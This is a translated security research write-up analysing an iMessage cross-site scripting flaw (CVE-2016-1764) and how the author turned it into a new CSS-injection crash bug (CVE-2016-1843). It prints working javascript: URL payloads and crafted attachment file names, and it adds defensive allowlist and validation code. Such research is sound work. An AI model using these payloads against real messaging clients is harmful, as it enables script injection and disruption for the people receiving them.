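Author: SuperHei (Knownsec 404 Security Lab) 2016.4.11
Note: the "0day" in this article was assigned the vulnerability ID CVE-2016-1843 after it was reported to the vendor.
1. Background
A few days ago, foreign researchers published details of an iMessage XSS vulnerability (CVE-2016-1764) that was fixed in the March update: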
https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/
https://github.com/BishopFox/cve-2016-1764
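The details they published did not actually include a detailed analysis of the trigger point. After analyzing it myself, I used this information to find a new 0day.
2. Analysis of CVE-2016-1764
The simplest trigger payload for CVE-2016-1764 is: javascript://a/research?%0d%0aprompt(1). This is clearly an XSS caused by a small trick in the javascript: protocol, where %0d%0a is left unhandled. This trick is fairly common when hunting for XSS vulnerabilities.
It is worth mentioning why prompt(1) is used here rather than the alert(1) we normally use. In my actual testing I found that alert indeed could not pop up. In addition, many websites simply filter out alert, so the reminder here is that when testing for XSS, it is necessary to replace alert with prompt.
To analyze a client-side XSS like this, the first step should be to look at location.href. This mainly tells you which origin you are in; this vulnerability runs under the applewebdata:// protocol, as the original analysis states. Next you need to look at the specific trigger point. In a browser we can usually analyze this by viewing the HTML source, but in a client application you generally cannot see it, so a small trick is used here: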
javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)
This shows the head code of the HTML:
<style>@media screen and (-webkit-device-pixel-ratio:2) {}</style><link rel="stylesheet" type="text/css" href="file:///System/Library/PrivateFrameworks/SocialUI.framework/Resources/balloons-modern.css">
Next, look at the body code:
javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)
<chatitem id="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="1" item-type="header"><header guid="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"><headermessage text-direction="ltr">與“xxx@xxx.com”進行 iMessage 通信</headermessage></header></chatitem><chatitem id="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="2" item-type="timestamp"><timestamp guid="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" id="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"><date date="481908183.907740">今天 23:23</date></timestamp></chatitem><chatitem id="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes"><message guid="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E301475" emote="no" played="no" auto-reply="no" group-last-message="yes" group-first-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:23:03" aria-label="javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href=" " title="javascript://a/research?
prompt(1,document.body.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem><chatitem id="p:0/64989837-6626-44CE-A689-5460313DC817" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/64989837-6626-44CE-A689-5460313DC817" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:23:03" aria-label="javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href="javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)" title="javascript://a/research?
prompt(1,document.body.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem><chatitem id="p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes"><message guid="p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E301475" emote="no" played="no" auto-reply="no" group-last-message="yes" group-first-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:24:51" aria-label="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="javascript://a/research?
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem><chatitem id="s:AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" role="heading" aria-level="1" item-type="status" receipt-fade="in"><receipt from-me="YES" id="receipt-delivered-s:ae1abcf1-2397-4f20-a71f-d71ffe8042f5"><div class="receipt-container"><div class="receipt-item">已送達</div></div></receipt></chatitem><chatitem id="p:0/43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:24:51" aria-label="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="javascript://a/research?
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem>
So the key trigger point is:
<a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="javascript://a/research?
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a >
This is it.
The javascript: URI goes directly into the href of the a tag, so it executes on click. The fix in the new version is to simply not parse javascript:// .
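The check that was missing at this trigger point, as an added example that is not code from the original article or from Apple: a linkifier that only turns text into a clickable href when its scheme is on an allowlist. The function names and the allowlist contents are assumptions; the sample input is the payload quoted above.

```javascript
// Added example: scheme allowlist for a chat linkifier (hypothetical helper names).
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Returns a normalized href if the text is a link we accept, otherwise null.
function safeHref(text) {
  let url;
  try {
    url = new URL(text.trim()); // the URL parser lowercases the scheme for us
  } catch {
    return null; // not an absolute URL: render as plain text
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// What a WebView evaluates for a javascript: URL: the scheme is stripped and the
// rest is percent-decoded. Splitting on newlines shows that "//..." is only a
// one-line comment and that %0d%0a starts a fresh line of script after it.
function decodedScriptLines(text) {
  const body = text.replace(/^\s*javascript:/i, "");
  return decodeURIComponent(body).split(/\r\n|\r|\n/);
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Renders a message: a link only for allowlisted schemes, inert text otherwise.
function renderMessage(text) {
  const href = safeHref(text);
  const label = escapeHtml(text);
  return href ? `<a href="${escapeHtml(href)}">${label}</a>` : `<span>${label}</span>`;
}

const sample = "javascript://a/research?%0d%0aprompt(1)"; // payload quoted in the article
console.log(decodedScriptLines(sample)); // comment line, then the code line
console.log(renderMessage(sample));      // rendered as a <span>, not a link
```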
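3. From the old vulnerability (CVE-2016-1764) to a 0day
The essence of an XSS vulnerability is that the code you inject ends up being parsed and executed. Now that we have seen document.head.innerHTML, are there other opportunities to inject code? The first thing I tested was of course that same point, trying to close it with " and <>, but unfortunately these were all filtered. Since that point did not work, we can look at other points that take input, so I tried sending an attachment to see how it is parsed. Part of the code is as follows: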
<chatitem id="p:0/FE98E898-0385-41E6-933F-8E87DB10AA7E" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/FE98E898-0385-41E6-933F-8E87DB10AA7E" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:34:41" file-transfer-element="yes" aria-label="文件傳輸: tttt.html"><messagetextcontainer text-direction="ltr"><transfer class="transfer" id="45B8E6BD-9826-47E2-B910-D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F"><transfer-atom draggable="true" aria-label="tttt.html" id="45B8E6BD-9826-47E2-B910-D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F">< img class="transfer-icon" extension="html" aria-label="文件擴展名: html" style="content: -webkit-image-set(url(transcript-resource://iconpreview/html/16) 1x, url(transcript-resource://iconpreview/html-2x/16) 2x);"><span class="transfer-text" color-important="no">tttt</span></transfer-atom><div class="transfer-button-container">< img class="transfer-button-reveal" aria-label="顯示" id="filetransfer-button-45B8E6BD-9826-47E2-B910-D584CE461E5F" role="button"></div></transfer></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem>
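I sent an attachment named tttt.html, and the attachment's file name appears in the code, so there may be a chance to control it. After many tests I found that the filtering is also fairly strict, but in the end I still found a potential point, namely the extension part of the file name: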
<chatitem id="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" typing-indicator="no" sent="no" from-me="no" from-system="no" from="93D2D530-0E94-4CEB-A41E-2F21DE32715D" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 16:46:10" file-transfer-element="yes" aria-label="文件傳輸: testzzzzzzz"'><img src=1>.htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d"><messagetextcontainer text-direction="ltr"><transfer class="transfer" id="A6BE6666-ADBF-4039-BF45-042D261EA458" guid="A6BE6666-ADBF-4039-BF45-042D261EA458"><transfer-atom draggable="true" aria-label="testzzzzzzz"'><img src=1>.htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" id="A6BE6666-ADBF-4039-BF45-042D261EA458" guid="A6BE6666-ADBF-4039-BF45-042D261EA458">< img class="transfer-icon" extension="htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" aria-label="文件擴展名: htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d/16) 1x, url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d-2x/16) 2x);"><span class="transfer-text" color-important="no">testzzzzzzz"'><img src=1></span></transfer-atom><div class="transfer-button-container">< img class="transfer-button-reveal" aria-label="顯示" id="filetransfer-button-A6BE6666-ADBF-4039-BF45-042D261EA458" role="button"></div></transfer></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="compact"></date></message><spacer></spacer></chatitem>
The extension of the attachment we submitted went into style:
style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d/16) 1x, url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d-2x/16) 2x);
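This may lead to CSS injection, so perhaps we still have a chance. However, testing showed that there is filtering here too; for example, / is converted directly into : . This is very interesting, a case of "made by Xiao He, undone by Xiao He": if you want to inject CSS you certainly need : to give a property its value, but : cannot appear in a file name; and to load a remote CSS file or image from the injected CSS we need /, but / is processed and turned into : .
In any case, I first injected some CSS to test, so I submitted an attachment named: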
zzzzzz.htm) 1x);color/red;aaa/((
By inference, / becomes : , so if the injection succeeds the result should be:
style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x);color:red;aaa:((
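When I submitted the test and sent this attachment, my iMessage crashed. At this point I thought I had found a new vulnerability, so I upgraded OS X to the latest version and retested. The result: a brand-new 0day was born!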
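The style-attribute sink described in this section, as an added example that is not code from the original article or from Apple: a naive builder that mirrors the markup shown above beside a hardened one that validates the extension first. All function names and the "generic" fallback icon are assumptions, and the declaration splitter is a simplified stand-in for a real CSS parser.

```javascript
// Added example; function names and the "generic" fallback icon are assumptions.
const ICON = "transcript-resource://iconpreview";

function extensionOf(filename) {
  const dot = filename.lastIndexOf(".");
  return dot < 0 ? "" : filename.slice(dot + 1);
}

function iconStyle(token) {
  return `content: -webkit-image-set(url(${ICON}/${token}/16) 1x, url(${ICON}/${token}-2x/16) 2x);`;
}

// Before: the raw extension lands inside url(...) in the style attribute,
// after "/" has been rewritten to ":" as the article observed.
function naiveIconStyle(filename) {
  return iconStyle(extensionOf(filename).replace(/\//g, ":"));
}

// After: the extension is used only if it is a short alphanumeric token,
// so no ")", ";" or ":" from a file name can ever reach the CSS context.
function safeIconStyle(filename) {
  const ext = extensionOf(filename).toLowerCase();
  return iconStyle(/^[a-z0-9]{1,16}$/.test(ext) ? ext : "generic");
}

// Property names of the top-level declarations in a style string.
// Simplified: tracks parentheses only, ignores CSS strings and escapes.
function topLevelProperties(style) {
  const props = [];
  let depth = 0, current = "";
  const flush = () => {
    if (current.includes(":")) props.push(current.split(":")[0].trim());
    current = "";
  };
  for (const ch of style) {
    if (ch === "(") depth++;
    else if (ch === ")") depth = Math.max(0, depth - 1);
    if (ch === ";" && depth === 0) flush();
    else current += ch;
  }
  flush();
  return props;
}

const name = "zzzzzz.htm) 1x);color/red;aaa/(("; // attachment name from the article
console.log(topLevelProperties(naiveIconStyle(name))); // extra declarations appear
console.log(topLevelProperties(safeIconStyle(name)));  // only "content"
```

A check like topLevelProperties can also serve as a regression test: any attachment name that yields a property other than content means file-name data escaped the url() context.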
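4. Afterword
Of course there are still many places here that can be tested, and some ideas that are worth trying. For example, the name there should be controllable; or, since attachments are saved locally, whether a directory traversal might allow writing to an arbitrary directory. Those who are interested can keep testing; maybe the next 0day will be yours :)
Finally, what I want to say is that when analyzing a vulnerability someone else found, you must find the crux of the vulnerability, then summarize and distill a "model" from it, and then try new attack ideas or attack surfaces!
Reference link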
https://www.seebug.org/vuldb/ssvid-92471
This article was published by Seebug Paper. Please credit the source when reposting. Article URL: http://www.bjnorthway.com/65/